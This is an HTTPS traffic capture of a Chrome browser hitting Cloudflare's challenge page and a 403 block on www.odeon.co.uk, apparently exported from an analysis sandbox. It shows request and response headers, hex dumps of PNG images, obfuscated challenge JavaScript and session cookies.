2024-12-10 09:06:52 UTC	715	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 c0 00 00 00 35 08 03 00 00 00 b9 bf 72 9e 00 00 00 5d 50 4c 54 45 00 00 00 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 eb eb eb 99 99 99 c4 c4 c4 f1 f1 f1 e1 e1 e1 cc cc cc d2 d2 d2 b5 b5 b5 ad ad ad 9d 9d 9d 9b 9b 9b d8 d8 d8 de de de c1 c1 c1 ba ba ba a8 a8 a8 ea ea ea e4 e4 e4 b1 b1 b1 a3 a3 a3 e7 e7 e7 ee ee ee c9 c9 c9 85 39 57 29 00 00 00 08 74 52 4e 53 00 fa d2 75 09 d7 d6 20 00 ef cb c3 00 00 02 15 49 44 41 54 78 da ec db e9 6e a4 30 10 04 e0 9e 23 89 0b c6 9c c3 cd cc fb 3f e6 66 d7 ac 8d 14 c8 49 c6 42 ae ef 67 a9 ff b6 ba 84 85 88 9c 4f c7 03 88 68 57 0e c7 d3 59 5e bd 3c 83 88 76 e8 f9 45 e4 fc 04 22 da a5 a7 b3 9c 40 44 3b 75 92 23 88 68 a7 8e c2 ef 57 44 bb 75 10 10 Data Ascii: PNGIHDR5r]PLTE9W)tRNSu IDATxn0#?fIBgOhWY^<vE"@D;u#hWDu

Timestamp	Bytes transferred	Direction	Data
2024-12-10 09:06:52 UTC	818	OUT	GET /cdn-cgi/images/cf-no-screenshot-error.png HTTP/1.1 Host: www.odeon.co.uk Connection: keep-alive sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.odeon.co.uk/cdn-cgi/styles/cf.errors.css Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: __cf_bm=nkAWqWWDt_CUbpAdoHc0ljQUuIjnZWTFp6IRTH5_i54-1733821610-1.0.1.1-tXMJjcCp6ajZm7T9QvC8w7Mi61.YbKD4PqIlRRWEhp4ke5lZuxrTq5QCY5j9uWmK0Orz7zzGGFQcBjv6vLC2hw
2024-12-10 09:06:52 UTC	410	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 09:06:52 GMT Content-Type: image/png Content-Length: 3213 Connection: close Last-Modified: Thu, 05 Dec 2024 16:15:40 GMT ETag: "6751d1ac-c8d" Server: cloudflare CF-RAY: 8efc14d59f21afa4-ATL X-Frame-Options: DENY X-Content-Type-Options: nosniff Expires: Tue, 10 Dec 2024 11:06:52 GMT Cache-Control: max-age=7200 Cache-Control: public Accept-Ranges: bytes
2024-12-10 09:06:52 UTC	959	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b2 00 00 00 af 08 03 00 00 00 6e 1c 74 1f 00 00 02 d0 50 4c 54 45 00 00 00 ff ff ff ff 80 80 ff 55 55 bf 40 40 cc 33 33 d4 2a 2a db 24 49 bf 40 40 c6 39 39 cc 33 33 d1 2e 2e bf 2a 2a c4 27 27 c8 24 37 cc 33 33 bf 30 30 c3 2d 2d c6 2a 2a c9 28 28 bf 26 26 c2 24 31 c5 2e 2e bc 2c 2c bf 2a 2a c2 29 29 c4 27 27 bd 26 2f bf 24 2e c1 2c 2c c3 2a 2a bd 29 29 bf 28 28 c1 27 27 bf 2a 2a c1 29 29 c3 28 28 be 27 27 bf 26 26 c1 25 2c c2 24 2a be 2a 2a bf 29 29 c1 28 28 bc 27 27 be 26 26 bf 25 2a c1 24 2a bd 29 29 be 28 28 c0 26 26 bd 26 2a be 25 2a bf 24 29 bd 28 28 be 27 27 bf 26 26 c0 26 2a bd 25 29 be 24 28 bf 24 28 bc 27 27 bd 27 27 be 26 26 bc 25 29 bd 24 28 bf 27 27 bd 26 26 be 25 29 bf 25 28 bd 24 28 be Data Ascii: PNGIHDRntPLTEUU@@33$I@@9933..''$73300--((&&$1..,,))''&/$.,,))((''))((''&&%,$**))((''&&%$))((&&&%$)((''&&&%)$($(''''&&%)$(''&&%)%($(
2024-12-10 09:06:52 UTC	1369	IN	Data Raw: ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe 34 dd b2 71 00 00 08 7d 49 44 41 54 78 da ed 9d fb 5f 15 45 18 c6 e7 20 1c f1 88 02 e2 51 10 31 b3 bc e5 35 6f 69 9a a4 26 59 26 9a 5a 26 11 69 a2 e2 a5 d2 cc 22 af 05 6a 9a a2 96 9a 8a 22 9a e2 5d b9 69 89 a9 a0 88 5c 2d 4d 25 c5 6b 2a 06 04 bc ff 42 de 15 98 dd 79 67 76 76 f7 d4 e7 3c 3f cf 3e f3 65 d9 9d 79 e7 9d 77 e7 10 e2 94 53 4e fd cf 54 d7 db f5 bf 80 e9 d6 26 68 dc 9c d8 a4 13 e7 8b e1 81 ae 15 a4 ed 58 3e 7d 54 9f c6 8e 48 5b a7 67 c4 ba cc 52 50 d2 95 a4 e8 91 2d 1c 08 d7 d6 6f 76 5a 19 b0 55 b4 29 cc 21 b0 1b 86 24 fc 0d 78 fd 1e d5 bb 96 a9 bc 9e a1 fb cb 81 57 45 8b 7b 59 4c e2 75 e9 Data Ascii: 4q}IDATx_E Q15oi&Y&Z&i"j"]i\-M%k*Bygvv<?>eywSNT&hX>}TH[gRP-ovZU)!$xWE{YLu
2024-12-10 09:06:52 UTC	885	IN	Data Raw: 8b e8 91 cc 89 ac f0 09 f4 67 5c 26 19 0d 89 06 d9 f6 73 75 56 a9 f0 08 0e e0 31 39 6e 67 54 c5 4f b2 4a 8c f8 73 15 5c 1a 70 94 4d 66 32 88 5d 63 59 79 a4 3a 3c 01 c2 2a 25 17 7c a0 75 92 45 bc 81 67 af 8d ad 31 4a 26 31 58 87 2c c6 e7 b1 6e 1b ee 37 db cc d8 9b c0 7f 51 a1 58 7e 3d 0c 69 70 8a 71 10 8a 75 e3 a3 ac 30 83 19 3b 46 fd a9 58 4e 61 c7 3d cc d9 be 48 62 80 8d 6e ea 2d 37 e0 90 57 2b 5b a0 a2 2c 56 7d 45 95 7b b7 41 bd 04 d9 15 f7 6c 8c 52 76 98 81 b8 9c b5 93 6e 8d af d2 7c bd 3a b3 0f e6 db bc 72 95 97 bd 23 fb f2 42 c6 9e a9 75 73 b5 0b d6 aa 33 63 86 e7 24 35 03 f6 ba 9d 51 b5 46 19 05 54 bf 85 b3 9c 46 20 87 ab f5 c8 ae b4 eb c3 3f 6e fd a0 c2 3c 0e 41 5c d1 4c ad cb 17 45 43 aa 27 bb ed 14 ad 50 64 0e c6 04 bc 89 ea ff 58 e6 c1 01 67 7c Data Ascii: g\&suV19ngTOJs\pMf2]cYy:<*%\|uEg1J&1X,n7QX~=ipqu0;FXNa=Hbn-7W+[,V}E{AlRvn\|:r#Bus3c$5QFTF ?n<A\LEC'PdXg\|

Timestamp	Bytes transferred	Direction	Data
2024-12-10 09:06:52 UTC	718	OUT	GET /cdn-cgi/challenge-platform/h/g/scripts/jsd/f9063374b04d/main.js? HTTP/1.1 Host: www.odeon.co.uk Connection: keep-alive sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: __cf_bm=nkAWqWWDt_CUbpAdoHc0ljQUuIjnZWTFp6IRTH5_i54-1733821610-1.0.1.1-tXMJjcCp6ajZm7T9QvC8w7Mi61.YbKD4PqIlRRWEhp4ke5lZuxrTq5QCY5j9uWmK0Orz7zzGGFQcBjv6vLC2hw
2024-12-10 09:06:53 UTC	323	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 09:06:53 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 8750 Connection: close cache-control: max-age=14400, stale-if-error=10800, stale-while-revalidate=10800, public x-content-type-options: nosniff Server: cloudflare CF-RAY: 8efc14da2a0fbcba-ATL
2024-12-10 09:06:53 UTC	1046	IN	Data Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 67 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 57 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 73 2c 76 29 7b 57 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 65 2c 56 2c 66 2c 67 29 7b 66 6f 72 28 56 3d 62 2c 66 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 67 3d 70 61 72 73 65 49 6e 74 28 56 28 34 36 31 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 56 28 34 32 37 29 29 2f 32 2b 70 61 72 73 65 49 6e 74 28 56 28 34 34 35 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 56 28 34 36 30 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 56 28 34 37 30 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 56 28 34 33 35 29 29 2f 36 2a 28 70 61 72 73 65 49 6e 74 28 56 28 34 38 35 29 29 2f 37 29 2b 70 61 72 73 65 49 Data Ascii: window._cf_chl_opt={cFPWv:'g'};~function(W,h,i,j,k,l,s,v){W=b,function(c,e,V,f,g){for(V=b,f=c();!![];)try{if(g=parseInt(V(461))/1+parseInt(V(427))/2+parseInt(V(445))/3(-parseInt(V(460))/4)+parseInt(V(470))/5+parseInt(V(435))/6(parseInt(V(485))/7)+parseI
2024-12-10 09:06:53 UTC	1369	IN	Data Raw: 6c 73 65 7b 66 6f 72 28 55 3d 31 2c 48 3d 30 3b 48 3c 4e 3b 50 3d 55 7c 50 3c 3c 31 2e 34 38 2c 46 2d 31 3d 3d 51 3f 28 51 3d 30 2c 4f 5b 5a 28 34 35 30 29 5d 28 47 28 50 29 29 2c 50 3d 30 29 3a 51 2b 2b 2c 55 3d 30 2c 48 2b 2b 29 3b 66 6f 72 28 55 3d 4b 5b 5a 28 34 36 36 29 5d 28 30 29 2c 48 3d 30 3b 31 36 3e 48 3b 50 3d 31 2e 34 32 26 55 7c 50 3c 3c 31 2e 32 36 2c 46 2d 31 3d 3d 51 3f 28 51 3d 30 2c 4f 5b 5a 28 34 35 30 29 5d 28 47 28 50 29 29 2c 50 3d 30 29 3a 51 2b 2b 2c 55 3e 3e 3d 31 2c 48 2b 2b 29 3b 7d 4c 2d 2d 2c 30 3d 3d 4c 26 26 28 4c 3d 4d 61 74 68 5b 5a 28 35 31 33 29 5d 28 32 2c 4e 29 2c 4e 2b 2b 29 2c 64 65 6c 65 74 65 20 4a 5b 4b 5d 7d 65 6c 73 65 20 66 6f 72 28 55 3d 49 5b 4b 5d 2c 48 3d 30 3b 48 3c 4e 3b 50 3d 50 3c 3c 31 7c 31 2e 34 26 Data Ascii: lse{for(U=1,H=0;H<N;P=U\|P<<1.48,F-1==Q?(Q=0,O[Z(450)](G(P)),P=0):Q++,U=0,H++);for(U=K[Z(466)](0),H=0;16>H;P=1.42&U\|P<<1.26,F-1==Q?(Q=0,O[Z(450)](G(P)),P=0):Q++,U>>=1,H++);}L--,0==L&&(L=Math[Z(513)](2,N),N++),delete J[K]}else for(U=I[K],H=0;H<N;P=P<<1\|1.4&
2024-12-10 09:06:53 UTC	1369	IN	Data Raw: 7c 3d 28 30 3c 54 3f 31 3a 30 29 2a 4e 2c 4e 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 52 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 52 3d 30 2c 53 3d 4d 61 74 68 5b 61 32 28 35 31 33 29 5d 28 32 2c 38 29 2c 4e 3d 31 3b 53 21 3d 4e 3b 54 3d 50 26 4f 2c 50 3e 3e 3d 31 2c 50 3d 3d 30 26 26 28 50 3d 46 2c 4f 3d 47 28 51 2b 2b 29 29 2c 52 7c 3d 28 30 3c 54 3f 31 3a 30 29 2a 4e 2c 4e 3c 3c 3d 31 29 3b 55 3d 65 28 52 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 52 3d 30 2c 53 3d 4d 61 74 68 5b 61 32 28 35 31 33 29 5d 28 32 2c 31 36 29 2c 4e 3d 31 3b 53 21 3d 4e 3b 54 3d 50 26 4f 2c 50 3e 3e 3d 31 2c 30 3d 3d 50 26 26 28 50 3d 46 2c 4f 3d 47 28 51 2b 2b 29 29 2c 52 7c 3d 28 30 3c 54 3f 31 3a 30 29 2a 4e 2c 4e 3c 3c 3d 31 29 3b 55 3d 65 28 52 29 3b 62 72 65 Data Ascii: \|=(0<T?1:0)N,N<<=1);switch(R){case 0:for(R=0,S=Math[a2(513)](2,8),N=1;S!=N;T=P&O,P>>=1,P==0&&(P=F,O=G(Q++)),R\|=(0<T?1:0)N,N<<=1);U=e(R);break;case 1:for(R=0,S=Math[a2(513)](2,16),N=1;S!=N;T=P&O,P>>=1,0==P&&(P=F,O=G(Q++)),R\|=(0<T?1:0)*N,N<<=1);U=e(R);bre
2024-12-10 09:06:53 UTC	1369	IN	Data Raw: 6c 69 74 28 27 41 27 29 2c 4a 3d 4a 5b 61 37 28 34 31 38 29 5d 5b 61 37 28 34 38 36 29 5d 28 4a 29 2c 4b 3d 30 3b 4b 3c 49 5b 61 37 28 35 32 30 29 5d 3b 4c 3d 49 5b 4b 5d 2c 4d 3d 6e 28 67 2c 45 2c 4c 29 2c 4a 28 4d 29 3f 28 4e 3d 4d 3d 3d 3d 27 73 27 26 26 21 67 5b 61 37 28 34 31 35 29 5d 28 45 5b 4c 5d 29 2c 61 37 28 34 31 33 29 3d 3d 3d 46 2b 4c 3f 48 28 46 2b 4c 2c 4d 29 3a 4e 7c 7c 48 28 46 2b 4c 2c 45 5b 4c 5d 29 29 3a 48 28 46 2b 4c 2c 4d 29 2c 4b 2b 2b 29 3b 72 65 74 75 72 6e 20 47 3b 66 75 6e 63 74 69 6f 6e 20 48 28 4f 2c 50 2c 61 36 29 7b 61 36 3d 62 2c 4f 62 6a 65 63 74 5b 61 36 28 34 39 37 29 5d 5b 61 36 28 34 30 39 29 5d 5b 61 36 28 34 39 31 29 5d 28 47 2c 50 29 7c 7c 28 47 5b 50 5d 3d 5b 5d 29 2c 47 5b 50 5d 5b 61 36 28 34 35 30 29 5d 28 4f Data Ascii: lit('A'),J=J[a7(418)][a7(486)](J),K=0;K<I[a7(520)];L=I[K],M=n(g,E,L),J(M)?(N=M==='s'&&!g[a7(415)](E[L]),a7(413)===F+L?H(F+L,M):N\|\|H(F+L,E[L])):H(F+L,M),K++);return G;function H(O,P,a6){a6=b,Object[a6(497)][a6(409)][a6(491)](G,P)\|\|(G[P]=[]),G[P][a6(450)](O
2024-12-10 09:06:53 UTC	1369	IN	Data Raw: 64 2c 6c 65 6e 67 74 68 2c 5f 63 66 5f 63 68 6c 5f 6f 70 74 3b 68 75 42 75 38 3b 48 43 47 48 34 3b 73 70 77 45 37 3b 78 41 71 71 6d 36 3b 72 6f 78 49 46 30 3b 76 45 74 65 34 3b 75 42 4e 68 69 35 3b 64 69 77 4d 77 38 3b 66 6a 47 56 64 33 3b 52 74 57 6d 30 3b 49 4e 75 76 34 3b 44 53 4a 76 38 3b 5a 55 50 72 31 3b 6a 57 72 72 37 3b 6e 57 73 53 58 32 3b 4f 43 65 6e 77 31 3b 66 53 72 52 48 36 2c 73 79 6d 62 6f 6c 2c 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 2c 75 6e 64 65 66 69 6e 65 64 2c 51 6c 62 6b 73 2c 73 65 74 52 65 71 75 65 73 74 48 65 61 64 65 72 2c 73 6f 75 72 63 65 2c 30 2e 37 38 36 38 31 30 38 36 33 36 37 31 30 36 37 39 3a 31 37 33 33 38 31 38 33 36 35 3a 46 4a 50 38 43 6f 64 4d 48 64 54 78 59 79 4f 71 6f 39 77 72 72 36 7a 38 34 5f 5f 59 5f 54 63 69 2d Data Ascii: d,length,_cf_chl_opt;huBu8;HCGH4;spwE7;xAqqm6;roxIF0;vEte4;uBNhi5;diwMw8;fjGVd3;RtWm0;INuv4;DSJv8;ZUPr1;jWrr7;nWsSX2;OCenw1;fSrRH6,symbol,createElement,undefined,Qlbks,setRequestHeader,source,0.7868108636710679:1733818365:FJP8CodMHdTxYyOqo9wrr6z84__Y_Tci-
2024-12-10 09:06:53 UTC	1369	IN	Data Raw: 5d 29 3f 27 61 27 3a 67 5b 45 5d 3d 3d 3d 65 5b 61 34 28 34 32 35 29 5d 3f 27 44 27 3a 21 30 3d 3d 3d 67 5b 45 5d 3f 27 54 27 3a 67 5b 45 5d 3d 3d 3d 21 31 3f 27 46 27 3a 28 46 3d 74 79 70 65 6f 66 20 67 5b 45 5d 2c 61 34 28 34 37 37 29 3d 3d 46 3f 6d 28 65 2c 67 5b 45 5d 29 3f 27 4e 27 3a 27 66 27 3a 6c 5b 46 5d 7c 7c 27 3f 27 29 7d 66 75 6e 63 74 69 6f 6e 20 42 28 45 2c 46 2c 61 68 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 2c 50 29 7b 69 66 28 61 68 3d 57 2c 21 79 28 2e 30 31 29 29 72 65 74 75 72 6e 21 5b 5d 3b 48 3d 28 47 3d 7b 7d 2c 47 5b 61 68 28 34 32 36 29 5d 3d 45 2c 47 5b 61 68 28 34 39 35 29 5d 3d 46 2c 47 29 3b 74 72 79 7b 69 66 28 49 3d 68 5b 61 68 28 34 36 37 29 5d 2c 4a 3d 61 68 28 34 31 36 29 2b 68 5b 61 68 28 34 30 38 29 5d 5b Data Ascii: ])?'a':g[E]===e[a4(425)]?'D':!0===g[E]?'T':g[E]===!1?'F':(F=typeof g[E],a4(477)==F?m(e,g[E])?'N':'f':l[F]\|\|'?')}function B(E,F,ah,G,H,I,J,K,L,M,N,O,P){if(ah=W,!y(.01))return![];H=(G={},G[ah(426)]=E,G[ah(495)]=F,G);try{if(I=h[ah(467)],J=ah(416)+h[ah(408)][
2024-12-10 09:06:53 UTC	859	IN	Data Raw: 61 6c 28 34 38 33 29 5d 3d 67 2c 68 5b 61 6c 28 34 39 33 29 5d 5b 61 6c 28 34 32 32 29 5d 28 47 2c 27 2a 27 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 63 2c 61 35 2c 65 29 7b 66 6f 72 28 61 35 3d 57 2c 65 3d 5b 5d 3b 6e 75 6c 6c 21 3d 3d 63 3b 65 3d 65 5b 61 35 28 34 31 30 29 5d 28 4f 62 6a 65 63 74 5b 61 35 28 35 30 32 29 5d 28 63 29 29 2c 63 3d 4f 62 6a 65 63 74 5b 61 35 28 34 31 37 29 5d 28 63 29 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 79 28 63 2c 61 62 29 7b 72 65 74 75 72 6e 20 61 62 3d 57 2c 4d 61 74 68 5b 61 62 28 34 34 39 29 5d 28 29 3c 63 7d 66 75 6e 63 74 69 6f 6e 20 78 28 61 61 2c 67 2c 45 2c 46 2c 47 2c 48 29 7b 61 61 3d 57 3b 74 72 79 7b 72 65 74 75 72 6e 20 67 3d 69 5b 61 61 28 33 39 38 29 5d 28 61 61 28 34 38 31 29 29 Data Ascii: al(483)]=g,h[al(493)][al(422)](G,'*')))}function o(c,a5,e){for(a5=W,e=[];null!==c;e=e[a5(410)](Object[a5(502)](c)),c=Object[a5(417)](c));return e}function y(c,ab){return ab=W,Math[ab(449)]()<c}function x(aa,g,E,F,G,H){aa=W;try{return g=i[aa(398)](aa(481))

Timestamp	Bytes transferred	Direction	Data
2024-12-10 09:06:53 UTC	792	OUT	POST /cdn-cgi/challenge-platform/h/g/jsd/r/8efc14cc593153fc HTTP/1.1 Host: www.odeon.co.uk Connection: keep-alive Content-Length: 16239 sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128" Content-Type: application/json sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.odeon.co.uk Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: __cf_bm=nkAWqWWDt_CUbpAdoHc0ljQUuIjnZWTFp6IRTH5_i54-1733821610-1.0.1.1-tXMJjcCp6ajZm7T9QvC8w7Mi61.YbKD4PqIlRRWEhp4ke5lZuxrTq5QCY5j9uWmK0Orz7zzGGFQcBjv6vLC2hw
2024-12-10 09:06:53 UTC	16239	OUT	Data Raw: 7b 22 77 70 22 3a 22 42 74 78 24 36 47 59 4c 36 4e 78 36 30 57 35 59 77 59 4a 68 2d 24 47 39 68 45 37 68 6c 52 6c 61 61 47 4c 59 71 4f 68 72 73 39 56 73 75 78 68 41 72 43 6d 35 73 4e 59 6e 68 30 77 78 49 4b 74 74 68 45 69 61 68 58 68 61 39 61 78 59 68 46 61 59 67 35 44 24 69 4e 74 63 55 34 24 72 73 6f 74 37 45 66 6e 4a 57 49 70 24 67 6f 36 4d 37 6a 59 66 62 43 68 53 67 37 2d 41 38 48 6c 4a 30 33 35 48 6c 41 47 38 42 78 68 35 24 37 6e 55 4f 33 68 68 76 49 67 72 4e 78 78 59 6f 68 57 41 68 59 6c 41 68 75 61 59 59 46 78 4b 61 75 68 68 2b 68 57 66 6f 68 68 43 61 38 73 74 35 45 75 74 47 42 49 30 61 68 57 71 4c 68 72 30 50 48 68 50 72 68 36 4c 43 79 24 61 30 55 59 52 72 58 49 69 6f 42 36 62 46 45 37 65 78 32 78 59 4d 68 72 41 6f 52 78 68 6a 78 75 50 6b 31 35 6b Data Ascii: {"wp":"Btx$6GYL6Nx60W5YwYJh-$G9hE7hlRlaaGLYqOhrs9VsuxhArCm5sNYnh0wxIKtthEiahXha9axYhFaYg5D$iNtcU4$rsot7EfnJWIp$go6M7jYfbChSg7-A8HlJ035HlAG8Bxh5$7nUO3hhvIgrNxxYohWAhYlAhuaYYFxKauhh+hWfohhCa8st5EutGBI0ahWqLhr0PHhPrh6LCy$a0UYRrXIioB6bFE7ex2xYMhrAoRxhjxuPk15k
2024-12-10 09:06:54 UTC	927	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 09:06:53 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 0 Connection: close Set-Cookie: cf_clearance=; Path=/; Expires=Thu, 01-Jan-70 00:00:00 GMT; Domain=.odeon.co.uk; Priority=High; HttpOnly; Secure; SameSite=None Set-Cookie: cf_clearance=69KUCqyXqXgtAcmqXI.ZNpC3lpPG7fC9DgyK.yikMGM-1733821613-1.2.1.1-fJjYRedGNM5ujsWxUogg7LhXU_Y.yK_vHuYWbO0ZNc3CrttMTghKb7MWRqCOSnD1MchEHrhCheWBGH1L9zuCulZNPm5YyVB96s_uMxg6CXfudRt7SL8azDquNPaGN_vX.NwRiqkWWqRBICw_yplyE8paXr5hBzKeO0cNqGm9vyMoIsG9d0AKoKA4JoScvw3gYfEZO1bEcyC.zksKRRmqStdVbSPAdHxDqVmiautWbpL4_Kmq7uVLhmKGFcbbZgwfbU7Ip4HVJR0sFVt_vDbtFJzuv.DDkhn534C1fbrYxH13g4q6pTxP3UwQBT1.STPoEhqY9_Ma150AuKPcqIKADDX_TBZE4.R9LNuERPhYCjtL1bkkdPXENcuFJo3kiv2G; Path=/; Expires=Wed, 10-Dec-25 09:06:53 GMT; Domain=.odeon.co.uk; Priority=High; HttpOnly; Secure; SameSite=None; Partitioned Server: cloudflare CF-RAY: 8efc14de9e6f6750-ATL

Timestamp	Bytes transferred	Direction	Data
2024-12-10 09:06:53 UTC	760	OUT	GET /favicon.ico HTTP/1.1 Host: www.odeon.co.uk Connection: keep-alive sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.odeon.co.uk/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: __cf_bm=nkAWqWWDt_CUbpAdoHc0ljQUuIjnZWTFp6IRTH5_i54-1733821610-1.0.1.1-tXMJjcCp6ajZm7T9QvC8w7Mi61.YbKD4PqIlRRWEhp4ke5lZuxrTq5QCY5j9uWmK0Orz7zzGGFQcBjv6vLC2hw
2024-12-10 09:06:54 UTC	320	IN	HTTP/1.1 403 Forbidden Date: Tue, 10 Dec 2024 09:06:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4515 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: max-age=15 Expires: Tue, 10 Dec 2024 09:07:09 GMT Server: cloudflare CF-RAY: 8efc14df8cb34578-ATL
2024-12-10 09:06:54 UTC	1049	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE
2024-12-10 09:06:54 UTC	1369	IN	Data Raw: 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a 20 20 20 20 20 20 63 6f 6f 6b 69 65 45 6c 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 27 62 6c 6f 63 6b 27 3b 0a 20 20 20 20 7d 29 0a 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 Data Ascii: mentById('cookie-alert'); cookieEl.style.display = 'block'; }) }</script>...<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Ple
